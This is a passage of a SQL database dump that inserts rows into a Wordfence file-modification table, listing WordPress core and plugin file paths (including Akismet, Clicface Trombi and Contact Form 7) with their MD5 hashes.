(0x2bc4e3f874a825523fd2db08f5f8a0cc, 'wp-admin/network/credits.php', 1, 0x00000000000000000000000000000000, 0x38192cde34142cc7ecf558f58ef475f0),
(0x0427da9e003bbebf3fc32b5607d2aace, 'wp-admin/network/edit.php', 1, 0x00000000000000000000000000000000, 0x0762a6fd96ebc6437943e13e401f3858),
(0xcf7546f3e2915e47faa545082b88b663, 'wp-admin/network/freedoms.php', 1, 0x00000000000000000000000000000000, 0x109efa9312c00370894f7e2ba27e9c31),
(0x00435f0a7f08ecc2146a440ba8e9406b, 'wp-admin/network/index.php', 1, 0x00000000000000000000000000000000, 0x8eb6142e96769f371f18654bc566083c),
(0x5da5821650b7bfee546b76748aba3841, 'wp-admin/network/menu.php', 1, 0x00000000000000000000000000000000, 0x3fb2a77edd1c1a27bc7f484bba4d95cc),
(0x99985b69785402ba71d4c37e5776a165, 'wp-admin/network/plugin-editor.php', 1, 0x00000000000000000000000000000000, 0x3fb5cd9ab947024d84585a0d693dcc12),
(0xaada70ba245e8186f48db5649d125a05, 'wp-admin/network/plugin-install.php', 1, 0x00000000000000000000000000000000, 0x6bbd804f795fa5a934f529a51a9886bf),
(0xb698c003e38ec622530ccead60137440, 'wp-admin/network/plugins.php', 1, 0x00000000000000000000000000000000, 0x4193887cb9cb7f4d4d3000bdf303bf1e),
(0x1dc63dc5027d430bf0e3ee69f0dc4854, 'wp-admin/network/profile.php', 1, 0x00000000000000000000000000000000, 0xd86926a7511d1d5cd3a2f0a502e7b6a8),
(0xede91a61985d5de34189ea27688ea480, 'wp-admin/network/settings.php', 1, 0x00000000000000000000000000000000, 0x4413f91b40c2e7f5f08fb7fb2fad3fd8),
(0x2fbb73bbb543348c98e0d6c0108f809e, 'wp-admin/network/setup.php', 1, 0x00000000000000000000000000000000, 0xee19cf426d3e6e397a5d891f08d19ae2),
(0x2bb3a718472a23f4b1edf4a694fd66b4, 'wp-admin/network/site-info.php', 1, 0x00000000000000000000000000000000, 0x909fb9e0d74b8102f8259b4dce6f99bc),
(0x79ea018ee447955c6098e1f9a24d5294, 'wp-admin/network/site-new.php', 1, 0x00000000000000000000000000000000, 0x2caa2febb21712829c31c55233f53c78),
(0x8bf37963e2304fb06729cf81ad4d66b8, 'wp-admin/network/site-settings.php', 1, 0x00000000000000000000000000000000, 0xb5442571c8fb3c0542ad34064156e612),
(0xa071f2ac68a2f6be4263f8393292ee11, 'wp-admin/network/site-themes.php', 1, 0x00000000000000000000000000000000, 0xa5b45fedee640e8864b558e725e1335c),
(0xe1718d402fbbb9eaa691d99e2d014dcb, 'wp-admin/network/site-users.php', 1, 0x00000000000000000000000000000000, 0xeb9b5f882e5d4099b5cf27a71cea11e5),
(0x6e93c6edc44092a741068ef9114607b4, 'wp-admin/network/sites.php', 1, 0x00000000000000000000000000000000, 0xcd6d9a2fd42411e925cccc0ae9b7928f),
(0x7b184ea488c832ed51ae75d4de3d099c, 'wp-admin/network/theme-editor.php', 1, 0x00000000000000000000000000000000, 0x804f9a460fa9e3646d83f915c51cd36a),
(0x687c68458888663a16c6b132029a827e, 'wp-admin/network/theme-install.php', 1, 0x00000000000000000000000000000000, 0x26d5b7cd315570d025e09e11313d24e4),
(0xd9ebbc217df13df6602a841b675a3d1f, 'wp-admin/network/themes.php', 1, 0x00000000000000000000000000000000, 0xf03f0a0fef72ad61b4cf0906499ebf47),
(0x377c6f4f559b92f97a0045660ebb9ce4, 'wp-admin/network/update-core.php', 1, 0x00000000000000000000000000000000, 0xa1223f017d52327b385cac03833f52ea),
(0x821ffd5ccf28e5d97742eac44912e39d, 'wp-admin/network/update.php', 1, 0x00000000000000000000000000000000, 0xba45a05ecc211e8cab75b4d529ff75f7),
(0x720c94ae6892c57686cf4c6b2f8516f6, 'wp-admin/network/upgrade.php', 1, 0x00000000000000000000000000000000, 0x924b1a33e95def0ae11eedf40531f653),
(0x0030f6f123168a39fd9cac5a34ce6a24, 'wp-admin/network/user-edit.php', 1, 0x00000000000000000000000000000000, 0x318173b6ccb63ed80ba3d08563c3ff14),
(0xf8c2364b31fdfe9b28eef6dd7d2f4158, 'wp-admin/network/user-new.php', 1, 0x00000000000000000000000000000000, 0x17d77af1fca0bbebabdc3b3d5a37eff3),
(0x09e9f1cfdb30398df72d62b185cda957, 'wp-admin/network/users.php', 1, 0x00000000000000000000000000000000, 0xa7bdafc9396e80dca313c97d27c37129),
(0xcd1e64ddeae36c50914fea92f9490484, 'wp-admin/network.php', 1, 0x00000000000000000000000000000000, 0x1571c993e8f3c553805113dee448c230),
(0xad4a54563044b7ee6f5441efbcbb40a1, 'wp-admin/options-discussion.php', 1, 0x00000000000000000000000000000000, 0x5de62bb11bbc2cd33f7bbf5ad83c64f4),
(0x6fed935bacd06e337582c8cab99f5035, 'wp-admin/options-general.php', 1, 0x00000000000000000000000000000000, 0x20a70936259c19f0caecc724648623f7),
(0x0dd1aa10311c73313daca16006289879, 'wp-admin/options-head.php', 1, 0x00000000000000000000000000000000, 0xbad695605e6db04e400a546f667eb70b),
(0xb6a6e25ce4c6012e31b0db2d9cbe0f3a, 'wp-admin/options-media.php', 1, 0x00000000000000000000000000000000, 0xf17bafedc4cf9e87ca6665f9c40b0c4e),
(0x15fc1829a7a3998a740dee2cbd4adabc, 'wp-admin/options-permalink.php', 1, 0x00000000000000000000000000000000, 0x1bb471b52027f7e9e9a7248363ebd0c5),
(0xd2b20b45357cd2d1b589438264e997bc, 'wp-admin/options-reading.php', 1, 0x00000000000000000000000000000000, 0x1d28ea7bc08105c9c50f8c5a63ec81f9),
(0xe24cb63e81d99f89237b36707d59e3ce, 'wp-admin/options-writing.php', 1, 0x00000000000000000000000000000000, 0x2a9e9bea0051f3320f90ad22453ca5cf),
(0x64d52819c4c8254ae9f9de40f5478610, 'wp-admin/options.php', 1, 0x00000000000000000000000000000000, 0xffca7d8a38ec6e0c13610d8aa2e8d974),
(0x61c963b543480d8508913d076c40c4b8, 'wp-admin/plugin-editor.php', 1, 0x00000000000000000000000000000000, 0x5324707f6dafd1ade6e1932bb96ebe0e),
(0xca786a5013d5f6bca8d92163c8177813, 'wp-admin/plugin-install.php', 1, 0x00000000000000000000000000000000, 0x48f1443442df98b3657f0e7daa8d5a26),
(0x4f90fb5ca9a2b55035d1d3ff7bbe52ae, 'wp-admin/plugins.php', 1, 0x00000000000000000000000000000000, 0xaf8d9c99d6fe4da676e42b147f919039);
INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x946b8ba5977adfa3f3d4ecd7626fd352, 'wp-admin/post-new.php', 1, 0x00000000000000000000000000000000, 0x0887abc5fb217325287248c7a7f3f7ad),
(0xebdd7641c06473bd8397b5ae4bb55d0f, 'wp-admin/post.php', 1, 0x00000000000000000000000000000000, 0xfd79839e48c7c94c55d39386e68948c6),
(0x51b7106016ba12f6e4380815fe4db838, 'wp-admin/press-this.php', 1, 0x00000000000000000000000000000000, 0x4404b5ee891dddde406cec1409944833),
(0x6834ac8bf22333c7608e2ddd88a822a2, 'wp-admin/profile.php', 1, 0x00000000000000000000000000000000, 0x9184e53f96bade3e7ae7cda9eddf7a26),
(0x5cd3000bf5a33ea62ba2b3c14662d0ed, 'wp-admin/revision.php', 1, 0x00000000000000000000000000000000, 0x49f102c83b57bc53618d4c5ae2a0f863),
(0xa763e386cc8eb488240a27409b0df2e8, 'wp-admin/setup-config.php', 1, 0x00000000000000000000000000000000, 0x8ef2353c54dc003abda1d26dbfa146d2),
(0x26c960d74fcb115135915110d53433bf, 'wp-admin/theme-editor.php', 1, 0x00000000000000000000000000000000, 0x4bd2891d26da0ec6de6817b5526c61b6),
(0x0af40da30c4283e4ae06087016ccad05, 'wp-admin/theme-install.php', 1, 0x00000000000000000000000000000000, 0x6135d508b83c81aa1a60795a3a1065be),
(0xbaa9c214e3125e5b5892e68e69b309ed, 'wp-admin/themes.php', 1, 0x00000000000000000000000000000000, 0x5955fa2536a64f5c036a4f0e17a42810),
(0xf13773fe5c5dd47d884141f9776531b7, 'wp-admin/tools.php', 1, 0x00000000000000000000000000000000, 0xfacaf33ed4359b0a63c0068608427b3a),
(0xcc217fe94c54e133959f69d9ea781bc5, 'wp-admin/update-core.php', 1, 0x00000000000000000000000000000000, 0x8f719303ff180751a19b0755cd4594b6),
(0x210f0b6f8d0dbfcd41888e7637e0dc65, 'wp-admin/update.php', 1, 0x00000000000000000000000000000000, 0x984897ccd344a44389d8c1d11aea6f7c),
(0x5e40d5b2017b27aba95fe8e2079b3932, 'wp-admin/upgrade-functions.php', 1, 0x00000000000000000000000000000000, 0xb3eb9737c1706049d44aba1c8afaf8f8),
(0x10e9e1e66a37725bbc2c94ccfc5ad6e8, 'wp-admin/upgrade.php', 1, 0x00000000000000000000000000000000, 0x8d896089cc6906285adf2998117b2fa3),
(0x26740221305e6787db624a88632c3e33, 'wp-admin/upload.php', 1, 0x00000000000000000000000000000000, 0xc79c047705204c213de4daff93bc4276),
(0x5e39282d28c5b2c5792089f7ca30712a, 'wp-admin/user/about.php', 1, 0x00000000000000000000000000000000, 0x99ec00da8d914b4efd2098a3e44ebe2d),
(0x3173b82936aad3b69995af43a785ce97, 'wp-admin/user/admin.php', 1, 0x00000000000000000000000000000000, 0x6f45693584572b283b708e04e91ad1bc),
(0xc91318a583dbd07e0d1a4b342823e3c5, 'wp-admin/user/credits.php', 1, 0x00000000000000000000000000000000, 0xd920b4fb1be2c2c780081d5b4b7de55a),
(0xa5523b6c7a4fe9386d3c3314944e6965, 'wp-admin/user/freedoms.php', 1, 0x00000000000000000000000000000000, 0x1ba6cbb9e2a9d3deb348997492ed692e),
(0x5beaa08fe67c4bf26f0ecadb8c6237f0, 'wp-admin/user/index.php', 1, 0x00000000000000000000000000000000, 0x95fd0d9c4779110487fed5e80568388c),
(0xf5e6d8f5a379a0f800ba0c22acee5105, 'wp-admin/user/menu.php', 1, 0x00000000000000000000000000000000, 0x4f0611a03d5eabe135a4fc81f0b660ac),
(0xf6d3e3ad60d726583cc461519f56685c, 'wp-admin/user/profile.php', 1, 0x00000000000000000000000000000000, 0x998b8d2ff632f8806edf3ee3785addd2),
(0x0217f48d7f133dfcf071af0d6c6a412b, 'wp-admin/user/user-edit.php', 1, 0x00000000000000000000000000000000, 0xf3f46510775af8c61dc0e4db598598f3),
(0xd20f4a687cb19430e7830b605a709845, 'wp-admin/user-edit.php', 1, 0x00000000000000000000000000000000, 0x585205fe2bef29943c7ebf2d8203d4d9),
(0x202a404144d29388123d7075b098d345, 'wp-admin/user-new.php', 1, 0x00000000000000000000000000000000, 0xcaa0660abd5314606693b52c086f2708),
(0x508ac510697aa174ee6103e9127dd461, 'wp-admin/users.php', 1, 0x00000000000000000000000000000000, 0xd3a7d6a5d5281110784c3a4b4a2fd87d),
(0x019954ea68cbd4ec7a07509ff91972e9, 'wp-admin/widgets.php', 1, 0x00000000000000000000000000000000, 0x46d6b23638b9e2bd115a22b2031c2c97),
(0x4995c43a17420e73de23d7e7ffde40d7, 'wp-blog-header.php', 1, 0x00000000000000000000000000000000, 0x5f81e56e3ac8ebf59ee135c253b835d8),
(0x5388fff7dc70d83ed9dd5772bd0e5945, 'wp-comments-post.php', 1, 0x00000000000000000000000000000000, 0xf7268ccd5aa033f919c2975bc523bd86),
(0x7ec5a5cf147300cc3179ec24914c7d68, 'wp-config-sample.php', 1, 0x00000000000000000000000000000000, 0x3ba201cb8327ef5d281eacf1e214973b),
(0x764b3b0240d173ba6155313ba9095ea9, 'wp-config.php', 0, 0xbc17a4a0c72b0b12239391b17efc94bb, 0xbc17a4a0c72b0b12239391b17efc94bb),
(0xfa2d5e67ff88ccba4000072ff7119386, 'wp-content/index.php', 1, 0x00000000000000000000000000000000, 0x67442c5615eba73d105c0715c6620850),
(0x919a93e484da64aef72227d40e05fa1e, 'wp-content/plugins/akismet/admin.php', 1, 0x00000000000000000000000000000000, 0xb0d39c7673dd42ea5e4610f873d733a3),
(0xaecad5d0c245d3a60f0fbdeb8b1d8ef7, 'wp-content/plugins/akismet/akismet.css', 1, 0x00000000000000000000000000000000, 0xf458203c2a43be7b53b8c0898f75220a),
(0x4a83f92183cdd17a264b3727ae49b7ea, 'wp-content/plugins/akismet/akismet.gif', 1, 0x00000000000000000000000000000000, 0x67a9581cbfcbeae70439582269022c45),
(0x21d356fdae3f3b041ad1c3c251fa9a8b, 'wp-content/plugins/akismet/akismet.js', 1, 0x00000000000000000000000000000000, 0x4c630d7bf8e6cd9775d409b64174d812),
(0x29cc83d532b16bd50868af9ff2211f20, 'wp-content/plugins/akismet/akismet.php', 1, 0x00000000000000000000000000000000, 0x1b15eec9a091b7e161ebe8546da73bf7),
(0x8059a42e347de95c974587c151d4f4ed, 'wp-content/plugins/akismet/img/logo.png', 1, 0x00000000000000000000000000000000, 0x0b72d73f3f19b33a9632767e5deefe09),
(0x1ca77ce92418d1770919fe2032748a25, 'wp-content/plugins/akismet/img/logo@2x.png', 1, 0x00000000000000000000000000000000, 0x27c7f1179f61d4f39c0d4980e37de655),
(0x41fdb089102468dc05f5d59d6051f861, 'wp-content/plugins/akismet/index.php', 1, 0x00000000000000000000000000000000, 0x55114b3b65a3f7a593e70e033ad305bf),
(0x1d8d77c5385329b47c0144a9c026e57a, 'wp-content/plugins/akismet/legacy.php', 1, 0x00000000000000000000000000000000, 0x6f903b8bb9e7e7c0049f5fc9cff5b8a0),
(0x92146fab2f02ca64f08d3478601ca49c, 'wp-content/plugins/akismet/readme.txt', 1, 0x00000000000000000000000000000000, 0x5ac2f89fa25d144fcddf62fd1ac89de7),
(0x94dc4fd7ee7ef613fab8faac568e7bb0, 'wp-content/plugins/akismet/widget.php', 1, 0x00000000000000000000000000000000, 0xfc82b5966e0bc53ea173e3a0b9e33990),
(0xb38834f1d11b428bb137c2026b213ebd, 'wp-content/plugins/clicface-trombi/clicface-trombi.php', 1, 0x00000000000000000000000000000000, 0xdf7df7f0c324c11cdcbf0b34c106d182),
(0x47ae536e0a08367e132412e33f685eab, 'wp-content/plugins/clicface-trombi/css/clicface-trombi-thickbox.css', 1, 0x00000000000000000000000000000000, 0x4f8d9be683b6e0fa1f31bc41ce0c07c9),
(0xf036757c2c3f3749182f6510ca30c3ab, 'wp-content/plugins/clicface-trombi/css/clicface-trombi.css', 1, 0x00000000000000000000000000000000, 0x15ab2511beebe01dba9b0c6e3f56e35a),
(0x58aba8d588708194986c5e3c8a87f5b9, 'wp-content/plugins/clicface-trombi/css/sprite.png', 1, 0x00000000000000000000000000000000, 0x2e8bc11cb7d42dc798dbdf99de674389),
(0x787118b525a1e1295c49dd43bea27ad1, 'wp-content/plugins/clicface-trombi/i18n/clicface-trombi-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0xc45b3026019ac219b0402ec7f1b4cfe0),
(0xc04d7dd4dfaafbdc954b5c0c08e9762e, 'wp-content/plugins/clicface-trombi/i18n/clicface-trombi-fr_FR.po', 1, 0x00000000000000000000000000000000, 0x74f07da69d252de6bff74d9413427b69),
(0x45d5cecca86a0c4c423d7b649a0b5b70, 'wp-content/plugins/clicface-trombi/i18n/clicface-trombi.pot', 1, 0x00000000000000000000000000000000, 0x85bb3daa4e536be7becfd8db2ff3a04d),
(0x9751ca0ebf1e7479a35b4544881804c6, 'wp-content/plugins/clicface-trombi/includes/class-collaborateur.php', 1, 0x00000000000000000000000000000000, 0xd7da292d29f52d5e09f8135fd9b53038),
(0x93f7bc6b0f042a44d174ce117601c8a5, 'wp-content/plugins/clicface-trombi/includes/class-piklist-checker.php', 1, 0x00000000000000000000000000000000, 0x5f91fa28976cdfdd43217dba1f84bf0a),
(0x92e1e8e33bb2eda0a695ba0195474ff7, 'wp-content/plugins/clicface-trombi/parts/meta-boxes/champs-collaborateur.php', 1, 0x00000000000000000000000000000000, 0x8e18a40445e570d0492f083e0e98073b),
(0xa96f9cf83c8f5462dbe4a424c09f344a, 'wp-content/plugins/clicface-trombi/parts/meta-boxes/help.php', 1, 0x00000000000000000000000000000000, 0x3edeb4a7db0423df12db6cbe25a72288),
(0x6e4f0c588699027298f828a241f9ed54, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-colors.php', 1, 0x00000000000000000000000000000000, 0xad1f7889d329edc64dc4195a1fb6e79f),
(0xb5f994de3fab2b5d403cef17e1cb4d0f, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-settings-fields.php', 1, 0x00000000000000000000000000000000, 0x2587ddb9c295733928b815f505e8f48d),
(0xefd48e61340a8360eb3b355437cf38e9, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-settings-grid.php', 1, 0x00000000000000000000000000000000, 0xb684e29a842868a58afdfaac0045eb1e),
(0x212f0227a4068c6861e452d3c07a99d1, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-settings-individual.php', 1, 0x00000000000000000000000000000000, 0x7f04565f25924ae9a217f445b53869cf),
(0x5580d40bc4d0d2406eb3a272248f07a7, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-settings.php', 1, 0x00000000000000000000000000000000, 0x11291d529bbfa72e1ed33684b8d6883b),
(0xf9de52f8c65cec306317917be49240ca, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-thickbox.php', 1, 0x00000000000000000000000000000000, 0xd2db0dbcab1c5434ca1d73e8ee15febe),
(0x822c517c853a37df11d87faf2d53b37f, 'wp-content/plugins/clicface-trombi/parts/settings/clicface-trombi-title.php', 1, 0x00000000000000000000000000000000, 0x699acf58910f2fef21082f09c85f8901),
(0xd3893b0eb3917c2ed6fd461cdaa4677c, 'wp-content/plugins/clicface-trombi/readme.txt', 1, 0x00000000000000000000000000000000, 0xfc4027139171d6d011d4c6cedb49c7fd),
(0xb8112c8467d24cdc13c86d78d8048488, 'wp-content/plugins/clicface-trombi/templates/single-collaborateur.php', 1, 0x00000000000000000000000000000000, 0x795c3fc264266f658ccc6ddcbd67910a),
(0xadb351446d54903990b3ec127bab38d1, 'wp-content/plugins/contact-form-7/admin/admin-functions.php', 1, 0x00000000000000000000000000000000, 0x8f533e24ac6b34ed7fd7d729b0ffcd9d),
(0x2b081122daffda1d738b01a2827f1493, 'wp-content/plugins/contact-form-7/admin/admin.php', 1, 0x00000000000000000000000000000000, 0x251e3f35251373b738213b42eba964bb),
(0xab15d44e50bdb2a33c12559288f786d8, 'wp-content/plugins/contact-form-7/admin/css/styles-rtl.css', 1, 0x00000000000000000000000000000000, 0x8e84a8f63dfe1843da13cd221743d326),
(0xc4c90da752d0a8db1d3cd7b401553b22, 'wp-content/plugins/contact-form-7/admin/css/styles.css', 1, 0x00000000000000000000000000000000, 0x865b9a8140f8482d6fa6dc01cd6c53c5),
(0x4692d95f3d5eabfce4618f8745aea67d, 'wp-content/plugins/contact-form-7/admin/edit-contact-form.php', 1, 0x00000000000000000000000000000000, 0x51f9b3ce6bc62643b20d773d8219cc9d),
(0xd6c7dd4c5ff23ad922dcd81d09139d15, 'wp-content/plugins/contact-form-7/admin/images/dropdown.gif', 1, 0x00000000000000000000000000000000, 0xe6759d3db7f29f095812081fe440caa0),
(0x31e2f14efe857ae2ac0e3affc49f4e36, 'wp-content/plugins/contact-form-7/admin/images/fade-butt.png', 1, 0x00000000000000000000000000000000, 0xe6c8b1c6db50db66bf04da9bbbe3ee0e),
(0x0e74df317770e58d4c12807fbe285769, 'wp-content/plugins/contact-form-7/admin/images/menu-icon.png', 1, 0x00000000000000000000000000000000, 0x909a7fe6c5a7d0127634641a05e44e5f),
(0xb6bd827c6047cbd34cb8a79e94eeec45, 'wp-content/plugins/contact-form-7/admin/images/screen-icon.png', 1, 0x00000000000000000000000000000000, 0x6105770b77c4fc8c923fa16561f7336e),
(0xbe3b21d3990f41d44fe393feabd75a97, 'wp-content/plugins/contact-form-7/admin/includes/class-contact-forms-list-table.php', 1, 0x00000000000000000000000000000000, 0xa55313cebfa0580baef49f9578f8c67e),
(0x53786b3fe8381b16011c6e5fa64ab399, 'wp-content/plugins/contact-form-7/admin/includes/meta-boxes.php', 1, 0x00000000000000000000000000000000, 0x003be432fb0e60c541507385471d27e9),
(0x020e3e41de58ea7fc91361b67390287e, 'wp-content/plugins/contact-form-7/admin/js/scripts.js', 1, 0x00000000000000000000000000000000, 0x2239072fa85e615d5df863be319ba31c),
(0xc2cb2f6119588c446b049ea5a3d379ad, 'wp-content/plugins/contact-form-7/admin/js/taggenerator.js', 1, 0x00000000000000000000000000000000, 0x352c8b431f21513ebf74d4608358b4c7),
(0x082c41e37d322b2fe978adfaebe3d19e, 'wp-content/plugins/contact-form-7/images/ajax-loader.gif', 1, 0x00000000000000000000000000000000, 0xaf962b37779a443a77ab836b3b7a93f5),
(0x57166bfa846dffaf60a15e536356d747, 'wp-content/plugins/contact-form-7/includes/capabilities.php', 1, 0x00000000000000000000000000000000, 0x210a4309e0124c9c3cea167dc5bc440a),
(0x73992f985f683b3559f071e3f2a91062, 'wp-content/plugins/contact-form-7/includes/classes.php', 1, 0x00000000000000000000000000000000, 0xac41c02adc668d228ebbe95d4663e473),
(0x612e4908fd8e631fc874528cdb732ea2, 'wp-content/plugins/contact-form-7/includes/controller.php', 1, 0x00000000000000000000000000000000, 0xf361597b74189e4607703922b56a636c),
(0x2fc3738097a2ea4e46a43ef0b8a236da, 'wp-content/plugins/contact-form-7/includes/css/styles-rtl.css', 1, 0x00000000000000000000000000000000, 0xc613c8832783ba45b10c20ca372a835e),
(0x8a0db7120462101c214580e76adab558, 'wp-content/plugins/contact-form-7/includes/css/styles.css', 1, 0x00000000000000000000000000000000, 0x37408293e997235edabd65cab8230617),
(0xcb91f272348f6febac85c7d7779f3d1e, 'wp-content/plugins/contact-form-7/includes/deprecated.php', 1, 0x00000000000000000000000000000000, 0x458db3b50de23fbe8f7c41dd52a89de3),
(0x7049fb828f3a5380ba880e9576908675, 'wp-content/plugins/contact-form-7/includes/formatting.php', 1, 0x00000000000000000000000000000000, 0xa36d395cbfbdb2b8a3d35e18d4f20c22),
(0x73cae8d79601fe9a3a8187fbd768d853, 'wp-content/plugins/contact-form-7/includes/functions.php', 1, 0x00000000000000000000000000000000, 0x6f33e4c0d2990788d6cbe71ce0e93657),
(0xf51ad68d3c72cac3743ce45f5ec08e92, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/animated-overlay.gif', 1, 0x00000000000000000000000000000000, 0x2b912f7c0653008ca28ebacda49025e7),
(0x9731f2e9b5bfe7b859c66c9754014b65, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_flat_0_aaaaaa_40x100.png', 1, 0x00000000000000000000000000000000, 0xbb23e30d05962c4713c0fdebd789b7db),
(0x17d4557523641bc0e6e080c2785d0245, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_flat_75_ffffff_40x100.png', 1, 0x00000000000000000000000000000000, 0xc3cf5fb9572ace4d0640e2e6ace60f19),
(0x58b85be28b9848c06efa15d7cc960924, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_55_fbf9ee_1x400.png', 1, 0x00000000000000000000000000000000, 0x6fb615d1216a8b04c59556dbae48ee7b),
(0x2f8b4415da63b887136cf5d307de8fdc, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_65_ffffff_1x400.png', 1, 0x00000000000000000000000000000000, 0x1d24c5bd50eaae757693b5fcfd9f2463),
(0x30fbc1ef26839ef31b4dbaf55565326a, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_75_dadada_1x400.png', 1, 0x00000000000000000000000000000000, 0x288824a13295b7854838dfc01254015e),
(0xfe577a5921ad6198ca7677510c5edeb1, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_75_e6e6e6_1x400.png', 1, 0x00000000000000000000000000000000, 0x2b370dfc2f76801aaecc992aa81692e1),
(0x45b710641dad95859ced5a45c15aba77, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_95_fef1ec_1x400.png', 1, 0x00000000000000000000000000000000, 0x4ae1aabe41b1a592c249505f1a22d048),
(0x4cec158dcf9600f71d7918221e50edcd, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_highlight-soft_75_cccccc_1x100.png', 1, 0x00000000000000000000000000000000, 0xf2cf6000c400868da74b0bc2bf0f5261),
(0x453c56363bb44ea2814ba95fb36c536b, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_222222_256x240.png', 1, 0x00000000000000000000000000000000, 0xaaab8cec5db99e71553f439512bdb1f3),
(0x5e449e569d041fe590e1d5216f90242b, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_2e83ff_256x240.png', 1, 0x00000000000000000000000000000000, 0x1c1d65a979810525490f15128f2a1804),
(0x0aabf535e216f93dbc494b94267bef50, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_454545_256x240.png', 1, 0x00000000000000000000000000000000, 0xfca21ebbab23c2bc9221af41a6496103),
(0x46f4382a22dab9fe70456d96262de66a, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_888888_256x240.png', 1, 0x00000000000000000000000000000000, 0x6ef84d318dda5781c7f268b30079b31e),
(0x182b4749ba045d246e96a86f910e52b0, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_cd0a0a_256x240.png', 1, 0x00000000000000000000000000000000, 0x502b17efeea2f63abdb12aae1b85913c),
(0xc44c39d4944cea4d55c229aa4d8f19d9, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.css', 1, 0x00000000000000000000000000000000, 0xd172b560b073f3bc42fea160bbff96a2),
(0x73a1ce324b0a9ab06cc6469eaa752f47, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css', 1, 0x00000000000000000000000000000000, 0x60f0405edd95e7135ec6a0bbc36d1385),
(0xa411b2450e6e5a62cdb45d770cf37f09, 'wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery.ui.theme.css', 1, 0x00000000000000000000000000000000, 0x2c238464ee5deea4320eada193f15378),
(0x3a6c0ec308cb6caac4ddfbb447868429, 'wp-content/plugins/contact-form-7/includes/js/jquery.form.js', 1, 0x00000000000000000000000000000000, 0x84ce0bde215a008f6ff49b4d3276fa46),
(0xe2def7ce2ff4512697eee11aa796b66f, 'wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js', 1, 0x00000000000000000000000000000000, 0xb981d711430f9702efdca99bcbaaabba),
(0x39e203db7f0348884d256a9a2612cf75, 'wp-content/plugins/contact-form-7/includes/js/scripts.js', 1, 0x00000000000000000000000000000000, 0xc805d8e19b04252537a8a47f0eabe244),
(0xed3417ee3ab913d2cd6a3b463fb5f52e, 'wp-content/plugins/contact-form-7/includes/pipe.php', 1, 0x00000000000000000000000000000000, 0x411f0d53055eaaf3360457e1b998d7dd),
(0xbcb94475f7844b8e4206d40b4c6ba397, 'wp-content/plugins/contact-form-7/includes/shortcodes.php', 1, 0x00000000000000000000000000000000, 0x1fa9cda3f20de6101004edbb58e56084),
(0xc1f7eb144ee2931b4fc6d254f0294548, 'wp-content/plugins/contact-form-7/languages/readme.txt', 1, 0x00000000000000000000000000000000, 0x0b6e2d40f9d96ce84049fe4495aa54c3),
(0x4ec0bb13170839b8f406459cec1f092d, 'wp-content/plugins/contact-form-7/languages/wpcf7-af.mo', 1, 0x00000000000000000000000000000000, 0xca2028f4bb44f2ac17810bf1106f304a),
(0xbd76d1bc924b182380f9ff3a5d757297, 'wp-content/plugins/contact-form-7/languages/wpcf7-ar.mo', 1, 0x00000000000000000000000000000000, 0x10356e6f6b4970d732c50376cc88bce0),
(0x954b78ec993be471fa1d8a18330c5773, 'wp-content/plugins/contact-form-7/languages/wpcf7-az_AZ.mo', 1, 0x00000000000000000000000000000000, 0x1abe485bdf3c5ce83e2c24d5748f0af0),
(0x7f98dce712ccbdbb8b46dd41d6789e6f, 'wp-content/plugins/contact-form-7/languages/wpcf7-be_BY.mo', 1, 0x00000000000000000000000000000000, 0xa26cd06fe091cdf283696a83ee10eff8),
(0x9592a3c158df2ec11bd0f9dda3acdab1, 'wp-content/plugins/contact-form-7/languages/wpcf7-bg_BG.mo', 1, 0x00000000000000000000000000000000, 0x4c285c5c8b67b7b9cb3ae7aaf8782079),
(0x594d29d08f7982f8bba981d02236186f, 'wp-content/plugins/contact-form-7/languages/wpcf7-bn_BD.mo', 1, 0x00000000000000000000000000000000, 0xd1f3a43fbd705f31f99eebc96001e33b),
(0x5125f4291587f5d53ea39651ca5155f8, 'wp-content/plugins/contact-form-7/languages/wpcf7-bn_IN.mo', 1, 0x00000000000000000000000000000000, 0x45e981198fbe841a2213239a27b9f3e1),
(0x7041973c1e5ebf96c2bbf1ebf8b2a9c1, 'wp-content/plugins/contact-form-7/languages/wpcf7-bs.mo', 1, 0x00000000000000000000000000000000, 0xd20b75e6140518b5a1014b465a18b519),
(0xb8def7af24b9c77d1f51b68083ff1c21, 'wp-content/plugins/contact-form-7/languages/wpcf7-ca.mo', 1, 0x00000000000000000000000000000000, 0x83de562b698186754a19008a8acd25a4),
(0x6b46a867cbe9082ea2901f1a1b5f2be1, 'wp-content/plugins/contact-form-7/languages/wpcf7-ckb.mo', 1, 0x00000000000000000000000000000000, 0xc2e5073d188bc1880fe4004d410b5ed4),
